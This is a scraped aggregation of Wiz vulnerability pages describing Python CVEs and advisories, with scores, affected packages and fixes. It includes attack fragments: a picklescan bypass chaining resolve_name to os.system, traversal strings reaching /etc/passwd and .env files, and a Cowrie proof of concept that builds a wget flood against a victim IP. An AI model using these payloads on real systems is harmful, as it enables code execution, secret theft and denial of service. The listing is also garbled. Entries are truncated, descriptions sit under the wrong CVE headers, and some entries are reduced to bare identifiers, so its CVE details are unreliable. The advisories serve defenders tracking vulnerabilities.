LangChain is a framework for building agents and LLM-powered applications. Prior to version 1.2.22, multiple functions in langchain_core.prompts.loading read files from paths embedded in deserialized config dicts without validating against directory traversal or absolute path injection. When an application passes user-influenced prompt configurations to load_prompt() or load_prompt_from_config(), an attacker can read arbitrary files on the host filesystem, constrained only by file-extension checks (.txt for templates, .json/.yaml for examples). This issue has been patched in version 1.2.22.
Source : NVD
## 7.5
Score
Published March 31, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Explo
Wiz
CVE-2026-21873 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-21873 [HIGH] CVE-2026-21873 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21873 :
Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. From versions 2.22.0 to 3.4.1, an unsafe implementation in the pushstate event listener used by ui.sub_pages allows an attacker to manipulate the fragment identifier of the URL, which they can do despite being cross-site, using an iframe. This issue has been patched in version 3.5.0.
Source : NVD
## 6.1
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 7.2
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nicegui
Sources
NVD
pip Severity HIGH Has Fix Added at: Jan 11, 2026
Wiz
CVE-2026-29787 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-29787 [MEDIUM] CVE-2026-29787 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29787 :
Python vulnerability analysis and mitigation
mcp-memory-service is an open-source memory backend for multi-agent systems. Prior to version 10.21.0, the /api/health/detailed endpoint returns detailed system information including OS version, Python version, CPU count, memory totals, disk usage, and the full database filesystem path. When MCP_ALLOW_ANONYMOUS_ACCESS=true is set (required for the HTTP server to function without OAuth/API key), this endpoint is accessible without authentication. Combined with the default 0.0.0.0 binding, this exposes sensitive reconnaissance data to the entire network. This issue has been patched in version 10.21.0.
Source : NVD
## 5.3
Score
Published March 7, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Pu
Wiz
CVE-2026-28795 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-28795 [HIGH] CVE-2026-28795 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28795 :
Python vulnerability analysis and mitigation
OpenChatBI is an intelligent chat-based BI tool powered by large language models, designed to help users query, analyze, and visualize data through natural language conversations. Prior to version 0.2.2, the save_report tool in openchatbi/tool/save_report.py suffers from a critical path traversal vulnerability due to insufficient input sanitization of the file_format parameter. This issue has been patched in version 0.2.2.
Source : NVD
## 8.7
Score
Published March 6, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.6
Exploitation Probability (EPSS) 0.1
Affe
Wiz
CVE-2025-14691 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-14691 [MEDIUM] CVE-2025-14691 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14691 :
Python vulnerability analysis and mitigation
A vulnerability was detected in Mayan EDMS up to 4.10.1. The affected element is an unknown function of the file /authentication/. The manipulation results in cross site scripting. The attack may be performed from remote. The exploit is now public and may be used. Upgrading to version 4.10.2 is sufficient to fix this issue. You should upgrade the affected component. The vendor confirms that this is "[f]ixed in version 4.10.2". Furthermore, that "[b]ackports for older versions in process and will be out as soon as their respective CI pipelines complete."
Source : NVD
## 5.3
Score
Published December 14, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
Wiz
GHSA-h45m-mgcp-q388 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-h45m-mgcp-q388 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-h45m-mgcp-q388 :
Python vulnerability analysis and mitigation
## Severity: HIGH
## Summary
openssl_encrypt_server/modules/pepper/totp.py
defaultdict(list)
## Affected Code
class TOTPRateLimiter:
def __init__(self, ...):
self.attempts: Dict[str, List[datetime]] = defaultdict(list)
self.lockouts: Dict[str, datetime] = {}
class TOTPService:
_rate_limiter = TOTPRateLimiter() # Class variable, in-memory only
## Impact
Rate limit state is not shared across multiple server instances/workers — an attacker can distribute attempts
All rate limit state is lost on server restart — allows immediate retry
In multi-worker deployments, each worker has independent rate limit state
## Recommended Fix
Use Redis or the database for rate limit state storage
Or use a shared-memory
Wiz
GHSA-vvpj-8cmc-gx39 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-vvpj-8cmc-gx39 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-vvpj-8cmc-gx39 :
Python vulnerability analysis and mitigation
## Summary
pkgutil.resolve_name()
"module:attribute"
pkgutil.resolve_name
os.system
builtins.exec
subprocess.call
pkgutil.resolve_name
_unsafe_globals
## Severity
Critical (CVSS 10.0) — Universal bypass of all blocklist entries. Any blocked function can be invoked.
## Affected Versions
picklescan <= 1.0.3 (all versions including latest)
## Details
## How It Works
A pickle file uses two chained REDUCE calls:
1. STACK_GLOBAL: push pkgutil.resolve_name
2. REDUCE: call resolve_name("os:system") → returns os.system function object
3. REDUCE: call the returned function("malicious command") → RCE
picklescan's opcode scanner sees:
STACK_GLOBAL
pkgutil
resolve_name
REDUCE
"os:system"
## Decompile
Wiz
GHSA-hvc7-763r-4f3h Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-hvc7-763r-4f3h Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-hvc7-763r-4f3h :
Python vulnerability analysis and mitigation
## Summary
revoke_key
openssl_encrypt_server/modules/keyserver/service.py
client_id
key.owner_client_id
## Impact
Any authenticated client can revoke any other client's key, as long as they provide a valid revocation signature. While the signature requirement mitigates this somewhat (you need the private key to sign), the lack of ownership check is a defense-in-depth gap.
## Recommended Fix
client_id == key.owner_client_id
Return 403 Forbidden if the requesting client does not own the key
## Fix
05e45f3
releases/1.4.x
Source : NVD
## 6.6
Score
Published April 1, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release
Wiz
CVE-2026-24157 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-24157 [HIGH] CVE-2026-24157 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24157 :
Python vulnerability analysis and mitigation
NVIDIA NeMo Framework contains a vulnerability in checkpoint loading where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure and data tampering.
Source : NVD
## 9.8
Score
Published March 24, 2026
Severity CRITICAL
CNA Score 7.8
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 27.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
nemo-toolkit
nemo
Sources
NVD
pip Severity HIGH Has Fix Added at: Apr 02, 2026
Nix Severity CRITICAL Has Fix Added at
Wiz
CVE-2026-34935 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-34935 [CRITICAL] CVE-2026-34935 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34935 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. From version 4.5.15 to before version 4.5.69, the --mcp CLI argument is passed directly to shlex.split() and forwarded through the call chain to anyio.open_process() with no validation, allowlist check, or sanitization at any hop, allowing arbitrary OS command execution as the process user. This issue has been patched in version 4.5.69.
Source : NVD
## 9.8
Score
Published April 3, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
praisonai
Sou
Wiz
GHSA-h5qv-qjv4-pc5m Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-h5qv-qjv4-pc5m Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-h5qv-qjv4-pc5m :
Python vulnerability analysis and mitigation
## Summary
zlib.decompress()
## Details
unfurl/parsers/parse_compressed.py
zlib.decompress(decoded)
Inputs are accepted from URL components that match base64 patterns.
Highly compressible payloads can expand orders of magnitude larger than their compressed size.
## PoC
security_poc/poc_decompression_bomb.py --generate-only
The script creates a base64-encoded zlib payload embedded in a URL.
/json/visjs
--test
## PoC Script
#!/usr/bin/env python3
"""
Unfurl Decompression Bomb Proof of Concept
This PoC demonstrates a Denial of Service vulnerability in Unfurl's
compressed data parsing. The zlib.decompress() call has no size limits,
allowing an attacker to submit small payloads that expand to gigabytes.
Wiz
CVE-2026-32611 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.0
CVE-2026-32611 [HIGH] CVE-2026-32611 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32611 :
Python vulnerability analysis and mitigation
psycopg.sql
glances/exports/glances_duckdb/__init__.py
?
Source : NVD
## 9.1
Score
Published March 18, 2026
Severity CRITICAL
CNA Score 7.0
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
glances
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity CRITICAL Has Fix Added at: Mar 19, 2026
Echo Severity CRITICAL No Fix Added at: Mar 19, 2026
pip Severity HIGH Has Fix Added at: Mar 17, 2026
Homebrew Severity CRITICAL Has Fix Added at: Mar 20, 2026
Nix Severity CRITICA
Wiz
CVE-2026-32711 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-32711 [HIGH] CVE-2026-32711 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32711 :
Python vulnerability analysis and mitigation
pydicom is a pure Python package for working with DICOM files. Versions 2.0.0-rc.1 through 3.0.1 are vulnerable to Path Traversal through a maliciously crafted DICOMDIR ReferencedFileID when it is set to a path outside the File-set root. pydicom resolves the path only to confirm that it exists, but does not verify that the resolved path remains under the File-set root. Subsequent public FileSet operations such as copy(), write(), and remove()+write(use_existing=True) use that unchecked path in file I/O operations. This allows arbitrary file read/copy and, in some flows, move/delete outside the File-set root. This issue has been fixed in version 3.0.2.
Source : NVD
## 7.8
Score
Published March 20, 2026
Severity HIGH
Wiz
CVE-2026-32597 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-32597 [HIGH] CVE-2026-32597 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32597 :
Python vulnerability analysis and mitigation
PyJWT is a JSON Web Token implementation in Python. Prior to 2.12.0, PyJWT does not validate the crit (Critical) Header Parameter defined in RFC 7515 §4.1.11. When a JWS token contains a crit array listing extensions that PyJWT does not understand, the library accepts the token instead of rejecting it. This violates the MUST requirement in the RFC. This vulnerability is fixed in 2.12.0.
Wiz Threat Research note: This vulnerability's initial access potential has been overridden to FALSE by the Wiz Research team, as it does not allow RCE on its own.
Source : NVD
## 7.5
Score
Published March 13, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CIS
Wiz
CVE-2025-65431 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2025-65431 [MEDIUM] CVE-2025-65431 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-65431 :
Python vulnerability analysis and mitigation
An issue was discovered in allauth-django before 65.13.0. Both Okta and NetIQ were using preferred_username as the identifier for third-party provider accounts. That value may be mutable and should therefore be avoided for authorization decisions. The providers are now using sub instead.
Source : NVD
## 5.4
Score
Published December 15, 2025
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
django-allauth
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 16,
Wiz
CVE-2026-26331 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-26331 [HIGH] CVE-2026-26331 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26331 :
Python vulnerability analysis and mitigation
--netrc-cmd
netrc_cmd
--netrc-cmd
netrc_cmd
--netrc-cmd
netrc_cmd
--netrc-cmd
netrc_cmd
{}
--netrc-cmd
Source : NVD
## 8.8
Score
Published February 24, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 40.7
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
yt-dlp
yt-dlp+default
Sources
NVD
Alpine 3.18, 3.19, 3.20, 3.21, 3.22 Severity HIGH No Fix Added at: Mar 02, 2026
Debian 12 Severity HIGH No Fix Added at: Feb 24, 2026
Debian 13 Severity MEDIUM No Fix Added at: Feb 24, 2026
Debian 14 Severity HIGH Has Fix Added at: F
Wiz
CVE-2026-33057 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-33057 [CRITICAL] CVE-2026-33057 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33057 :
Python vulnerability analysis and mitigation
Mesop is a Python-based UI framework that allows users to build web applications. In versions 1.2.2 and below, an explicit web endpoint inside the ai/ testing module infrastructure directly ingests untrusted Python code strings unconditionally without authentication measures, yielding standard Unrestricted Remote Code Execution. Any individual capable of routing HTTP logic to this server block will gain explicit host-machine command rights. The AI codebase package includes a lightweight debugging Flask server inside ai/sandbox/wsgi_app.py. The /exec-py route accepts base_64 encoded raw string payloads inside the code parameter natively evaluated by a basic POST web request. It saves it rapidly to the operating system logic
Wiz
GHSA-m7j5-r2p5-c39r Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-m7j5-r2p5-c39r Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-m7j5-r2p5-c39r :
Python vulnerability analysis and mitigation
## Summary
Unsafe pickle deserialization allows unauthenticated attackers to perform Arbitrary File Creation. By chaining the logging.FileHandler class, an attacker can bypass RCE-focused blocklists to create empty files on the server. The vulnerability allows creating zero-byte files in arbitrary locations but does not permit overwriting or modifying existing files.
## Details
The application deserializes untrusted pickle data. While RCE keywords may be blocked, the exploit abuses standard library features:
logging.FileHandler: The exploit instantiates this class using its default behavior (append mode).
Behavior on Existing Files: If the target file already exists, the handler opens it without modifying its con
Wiz
CVE-2026-23949 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-23949 [HIGH] CVE-2026-23949 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23949 :
Python vulnerability analysis and mitigation
jaraco.context.tarball()
/
../
dummy_dir/../../etc/passwd
../../etc/passwd
dummy_dir/inner.tar.gz
dummy_dir/../../config/.env
../../config/.env
Source : NVD
## 8.6
Score
Published January 20, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 25.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
setuptools
ansible-operator
Sources
NVD
Alpine 3.20, 3.21, 3.22, 3.23 Severity HIGH No Fix Added at: Mar 12, 2026
Chainguard Has Fix Added at: Jan 23, 2026
Debian 12 Severity HIGH No Fix Added at: Jan 21, 2026
Debian 13 Severity
Wiz
CVE-2026-35459 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-35459 [CRITICAL] CVE-2026-35459 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35459 :
Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. In 0.5.0b3.dev96 and earlier, pyLoad has a server-side request forgery (SSRF) vulnerability. The fix for CVE-2026-33992 added IP validation to BaseDownloader.download() that checks the hostname of the initial download URL. However, pycurl is configured with FOLLOWLOCATION=1 and MAXREDIRS=10, causing it to automatically follow HTTP redirects. Redirect targets are never validated against the SSRF filter. An authenticated user with ADD permission can bypass the SSRF fix by submitting a URL that redirects to an internal address.
Source : NVD
## 9.3
Score
Published April 6, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Python
Has Public
Wiz
CVE-2026-34544 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.4
CVE-2026-34544 [HIGH] CVE-2026-34544 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34544 :
Python vulnerability analysis and mitigation
OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From version 3.4.0 to before version 3.4.8, a crafted B44 or B44A EXR file can cause an out-of-bounds write in any application that decodes it via exr_decoding_run(). Consequences range from immediate crash (most likely) to corruption of adjacent heap allocations (layout-dependent). This issue has been patched in version 3.4.8.
Source : NVD
## 8.4
Score
Published April 1, 2026
Severity HIGH
CNA Score 8.4
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentil
Wiz
CVE-2026-33533 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-33533 [HIGH] CVE-2026-33533 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33533 :
Python vulnerability analysis and mitigation
Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.3, the Glances XML-RPC server (activated with glances -s or glances --server) sends Access-Control-Allow-Origin: * on every HTTP response. Because the XML-RPC handler does not validate the Content-Type header, an attacker-controlled webpage can issue a CORS "simple request" (POST with Content-Type: text/plain) containing a valid XML-RPC payload. The browser sends the request without a preflight check, the server processes the XML body and returns the full system monitoring dataset, and the wildcard CORS header lets the attacker's JavaScript read the response. The result is complete exfiltration of hostname, OS version, IP addresses, CPU/me
Wiz
CVE-2025-67221 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-67221 [HIGH] CVE-2025-67221 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67221 :
Python vulnerability analysis and mitigation
The orjson.dumps function in orjson thru 3.11.4 does not limit recursion for deeply nested JSON documents.
Source : NVD
## 7.5
Score
Published January 22, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
datadog-agent-fips-7.75
python313-orjson
Sources
NVD
Alpine 3.18, 3.19, 3.20, 3.21, 3.22, 3.23 Severity HIGH No Fix Added at: Feb 15, 2026
Chainguard Has Fix Added at: Jan 24, 2026
pip Severity HIGH Has Fix Added at: Jan 23, 2026
MinimOS Severity HIGH Has Fix Added at: Mar
Wiz
CVE-2026-24688 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-24688 [MEDIUM] CVE-2026-24688 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24688 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. An attacker who uses an infinite loop vulnerability that is present in versions prior to 6.6.2 can craft a PDF which leads to an infinite loop. This requires accessing the outlines/bookmarks. This has been fixed in pypdf 6.6.2. If projects cannot upgrade yet, consider applying the changes from PR #3610 manually.
Source : NVD
## 5.1
Score
Published January 27, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nemo
open-webu
Wiz
CVE-2025-67747 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2025-67747 [HIGH] CVE-2025-67747 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67747 :
Python vulnerability analysis and mitigation
marshal
types
types.FunctionType
marshal.loads
Source : NVD
## 7.1
Score
Published December 16, 2025
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
fickling
Sources
NVD
pip Severity HIGH Has Fix Added at: Dec 16, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Publish
Wiz
CVE-2026-24408 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-24408 [CRITICAL] CVE-2026-24408 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24408 :
Python vulnerability analysis and mitigation
_OAuthSession
Source : NVD
## 5
Score
Published January 26, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sigstore
Sources
NVD
pip Severity LOW Has Fix Added at: Jan 27, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-35615
CRITICAL
9.2
Wiz
CVE-2026-25734 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25734 [MEDIUM] CVE-2026-25734 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25734 :
Python vulnerability analysis and mitigation
Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. Versions prior to 35.8.3, 38.5.4, and 39.3.1 have a stored Cross-Site Scripting (XSS) vulnerability in the RSE metadata of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Source : NVD
## 4.8
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 6.1
Affected
Wiz
CVE-2026-33509 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33509 [HIGH] CVE-2026-33509 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33509 :
Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. From version 0.4.0 to before version 0.5.0b3.dev97, the set_config_value() API endpoint allows users with the non-admin SETTINGS permission to modify any configuration option without restriction. The reconnect.script config option controls a file path that is passed directly to subprocess.run() in the thread manager's reconnect logic. A SETTINGS user can set this to any executable file on the system, achieving Remote Code Execution. The only validation in set_config_value() is a hardcoded check for general.storage_folder — all other security-critical settings including reconnect.script are writable without any allowlist or path restriction. This issue has
Wiz
GHSA-83jg-m2pm-4jxj Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-83jg-m2pm-4jxj Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-83jg-m2pm-4jxj :
Python vulnerability analysis and mitigation
## Summary
A Server-Side Request Forgery (SSRF) vulnerability in Cowrie's emulated shell mode allows unauthenticated attackers to abuse the honeypot as an amplification vector for HTTP-based denial-of-service attacks against arbitrary third-party hosts.
## Details
wget
curl
wget
curl
## PoC
This is a rudimentary proof of concept demonstrating the amplification potential of this vulnerability. Setup:
Victim machine (192.168.1.30): runs a simple HTTP server
Attacker machine (192.168.1.20): initiates the attack
test:test
On the victim machine , start an HTTP server:
sudo python3 -m http.server 80
On the attacker machine , execute:
PAYLOAD=$(for i in {1..100}; do echo -n 'wget -q http://192.168.1.30;';
Wiz
CVE-2026-35171 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-35171 [CRITICAL] CVE-2026-35171 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35171 :
Python vulnerability analysis and mitigation
Kedro is a toolbox for production-ready data science. Prior to 1.3.0, Kedro allows the logging configuration file path to be set via the KEDRO_LOGGING_CONFIG environment variable and loads it without validation. The logging configuration schema supports the special () key, which enables arbitrary callable instantiation. An attacker can exploit this to execute arbitrary system commands during application startup. This is a critical remote code execution (RCE) vulnerability caused by unsafe use of logging.config.dictConfig() with user-controlled input. This vulnerability is fixed in 1.3.0.
Source : NVD
## 9.8
Score
Published April 6, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Explo
Wiz
CVE-2025-69219 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2025-69219 [HIGH] CVE-2025-69219 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69219 :
Python vulnerability analysis and mitigation
A user with access to the DB could craft a database entry that would result in executing code on Triggerer - which gives anyone who have access to DB the same permissions as Dag Author. Since direct DB access is not usual and recommended for Airflow, the likelihood of it making any damage is low.
You should upgrade to version 6.0.0 of the provider to avoid even that risk.
Source : NVD
## 8.8
Score
Published March 9, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
airflow-3
airf
Wiz
CVE-2026-27835 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-27835 [MEDIUM] CVE-2026-27835 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27835 :
Python vulnerability analysis and mitigation
RepetitionsConfigViewSet
MaxRepetitionsConfigViewSet
get_queryset()
.all()
Source : NVD
## 4.3
Score
Published February 26, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wger
Sources
NVD
pip Severity MEDIUM No Fix Added at: Mar 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV
Wiz
CVE-2026-3029 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-3029 [HIGH] CVE-2026-3029 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3029 :
Python vulnerability analysis and mitigation
A path traversal and arbitrary file write vulnerability exist in the embedded get function in ' main .py' in PyMuPDF version, 1.26.5.
Source : NVD
## 7.5
Score
Published March 19, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pymupdf
Sources
NVD
Debian 11, 12, 13 Severity HIGH No Fix Added at: Mar 20, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 20, 2026
Echo Severity HIGH No Fix Added at: Mar 20, 2026
pip Severity MEDIUM Has Fix Added at: Mar 20, 2026
## Ge
Wiz
CVE-2026-34400 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-34400 [MEDIUM] CVE-2026-34400 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34400 :
Python vulnerability analysis and mitigation
Alerta is a monitoring tool. Prior to version 9.1.0, the Query string search API (q=) was vulnerable to SQL injection via the Postgres query parser, which built WHERE clauses by interpolating user-supplied search terms directly into SQL strings via f-strings. This issue has been patched in version 9.1.0.
Source : NVD
## 6.9
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
alerta-server
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Apr 02, 2026
## Get a
Wiz
CVE-2026-25517 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-25517 [MEDIUM] CVE-2026-25517 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25517 :
Python vulnerability analysis and mitigation
